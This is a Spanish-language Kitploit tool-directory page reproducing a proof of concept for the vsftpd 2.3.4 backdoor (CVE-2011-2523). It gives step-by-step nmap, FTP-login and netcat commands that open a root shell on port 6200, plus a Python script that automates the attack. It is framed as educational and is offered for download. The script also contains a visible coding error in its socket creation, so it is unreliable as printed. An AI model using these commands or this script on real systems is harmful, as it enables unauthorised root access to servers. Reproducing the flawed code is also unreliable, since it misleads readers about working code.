Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) una vulnerabilidad crítica que conduce a una shell inversa de root. En este repositorio haré una Prueba de Concepto sobre cómo explotarla paso a paso, Manual y Automáticamente (Python) con fines educativos. | Kitploit
Herramientas/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) una vulnerabilidad crítica que conduce a una shell inversa de root. En este repositorio haré una Prueba de Concepto sobre cómo explotarla paso a paso, Manual y Automáticamente (Python) con fines educativos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 6 mesesAún no revisado

vsftpd-2.3.4---Ejecución-de-Comandos-de-Puerta-Trasera

vsftpd 2.3.4 (CVE-2011-2523) una vulnerabilidad crítica que conduce a una Shell Root. En este repositorio haré una PoC de cómo explotarla paso a paso, Manualmente y Automáticamente (Python) con fines educativos.

¿De qué trata la vulnerabilidad? En primer lugar, es un exploit del lado del servidor, por lo que lo explotaremos de forma remota. La idea es que cuando te conectas al servicio FTP en el puerto 21 por defecto usando un nombre de usuario que contenga :), se activa la apertura del puerto TCP 6200 con una Shell Root, de modo que cualquiera puede conectarse y tener acceso Root al servidor objetivo, lo cual es un desastre. Así que hagámoslo prácticamente paso a paso. Lo explicaré manualmente primero para tener una idea completa, luego hay un script de Python para explotarlo automáticamente.

Manualmente

Escaneo de Puertos

  1. puerto 21 abierto
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP
imagen
  1. puerto 6200 cerrado
root@kitploit:~
nmap -p6200 Target_IP
  • Port 6200 is closed for now imagen

Explotación

  1. Conéctate al servicio FTP y usa un nombre de usuario malicioso para activar la apertura del puerto 6200
root@kitploit:~
ftp Target_IP
  • Usuario: cualquiercosa:)
  • Contraseña: cualquiercosa imagen
  1. Verifica el puerto 6200 después de la conexión FTP
root@kitploit:~
nmap -p6200 Target_IP

El puerto 6200 está abierto ahora, así que esta es nuestra puerta trasera

imagen
  1. Conéctate al puerto 6200 para obtener una Shell Root en todo el servidor
root@kitploit:~
nc -nv Target_IP 6200

Finalmente, tenemos una Shell Root en la máquina objetivo. imagen


Automáticamente

Después de hacerlo manualmente, conocemos los pasos del exploit:

  1. Conectarse al servidor FTP en el puerto (21).
  2. Usar un nombre de usuario que contenga :) para activar la puerta trasera.
  3. Conectarse al puerto (6200).
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
Descargar herramienta